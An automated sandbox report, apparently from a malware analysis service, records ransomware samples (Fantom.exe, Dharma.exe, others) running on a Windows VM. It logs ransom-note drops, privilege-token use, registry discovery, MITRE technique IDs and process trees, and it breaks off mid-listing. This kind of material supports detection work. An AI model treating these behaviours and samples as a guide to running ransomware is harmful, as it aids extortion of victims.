File opened for modification	C:\Program Files\Common Files\microsoft shared\Source Engine\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\es-ES\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\bg-BG\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ro-RO\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\Common Files\System\ado\es-ES\DECRYPT_YOUR_FILES.HTML	Fantom.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	Fantom.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl\DECRYPT_YOUR_FILES.HTML	Fantom.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3872	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SearchHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dharma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mssql2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nc123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	msedge.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 153144.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 4387.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 646.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4088	msedge.exe
4088	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3444	identity_helper.exe
3444	identity_helper.exe
2816	msedge.exe
2816	msedge.exe
4844	msedge.exe
4844	msedge.exe
5576	msedge.exe
5576	msedge.exe
1804	Fantom.exe
1804	Fantom.exe
5508	Fantom.exe
5508	Fantom.exe
6036	Fantom.exe
6036	Fantom.exe
744	Fantom.exe
744	Fantom.exe
5824	Fantom.exe
5824	Fantom.exe
5188	Fantom.exe
5188	Fantom.exe
5688	Fantom.exe
5688	Fantom.exe
5124	Fantom.exe
5124	Fantom.exe

Suspicious behavior: LoadsDriver 32 IoCs

pid	Process
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe
2332	mssql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1804	Fantom.exe
Token: SeDebugPrivilege	5508	Fantom.exe
Token: SeDebugPrivilege	6036	Fantom.exe
Token: SeDebugPrivilege	744	Fantom.exe
Token: SeDebugPrivilege	5824	Fantom.exe
Token: SeDebugPrivilege	5188	Fantom.exe
Token: SeDebugPrivilege	5688	Fantom.exe
Token: SeDebugPrivilege	5124	Fantom.exe
Token: SeDebugPrivilege	5624	Fantom.exe
Token: SeDebugPrivilege	5988	Fantom.exe
Token: SeDebugPrivilege	5832	Fantom.exe
Token: SeDebugPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeDebugPrivilege	1292	mssql2.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeLoadDriverPrivilege	2332	mssql.exe
Token: SeIncreaseQuotaPrivilege	5732	WMIC.exe
Token: SeSecurityPrivilege	5732	WMIC.exe
Token: SeTakeOwnershipPrivilege	5732	WMIC.exe
Token: SeLoadDriverPrivilege	5732	WMIC.exe
Token: SeSystemProfilePrivilege	5732	WMIC.exe
Token: SeSystemtimePrivilege	5732	WMIC.exe
Token: SeProfSingleProcessPrivilege	5732	WMIC.exe
Token: SeIncBasePriorityPrivilege	5732	WMIC.exe
Token: SeCreatePagefilePrivilege	5732	WMIC.exe
Token: SeBackupPrivilege	5732	WMIC.exe
Token: SeRestorePrivilege	5732	WMIC.exe
Token: SeShutdownPrivilege	5732	WMIC.exe
Token: SeDebugPrivilege	5732	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5732	WMIC.exe
Token: SeRemoteShutdownPrivilege	5732	WMIC.exe
Token: SeUndockPrivilege	5732	WMIC.exe
Token: SeManageVolumePrivilege	5732	WMIC.exe
Token: 33	5732	WMIC.exe
Token: 34	5732	WMIC.exe

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
5496	SearchHost.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
3344	msedge.exe
5496	SearchHost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2332	mssql.exe
1292	mssql2.exe
5496	SearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3344 wrote to memory of 3512	3344	msedge.exe	83
PID 3344 wrote to memory of 3512	3344	msedge.exe	83
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 2648	3344	msedge.exe	84
PID 3344 wrote to memory of 4088	3344	msedge.exe	85
PID 3344 wrote to memory of 4088	3344	msedge.exe	85
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86
PID 3344 wrote to memory of 3868	3344	msedge.exe	86

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5388	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfe8646f8,0x7ffdfe864708,0x7ffdfe864718
  2⤵
  PID:3512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  PID:3664
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5636 /prefetch:8
  2⤵
  PID:4060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6152 /prefetch:8
  2⤵
  PID:680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2816
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- - C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"
    3⤵
    - Executes dropped EXE
    PID:4124
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5508
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6036
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:744
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5824
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5188
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1912 /prefetch:1
  2⤵
  PID:5696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
  2⤵
  PID:5764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:1
  2⤵
  PID:1580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
  2⤵
  PID:3740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1740 /prefetch:8
  2⤵
  PID:5652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,1085965302840478030,8668818182654533909,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4728 /prefetch:8
  2⤵
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
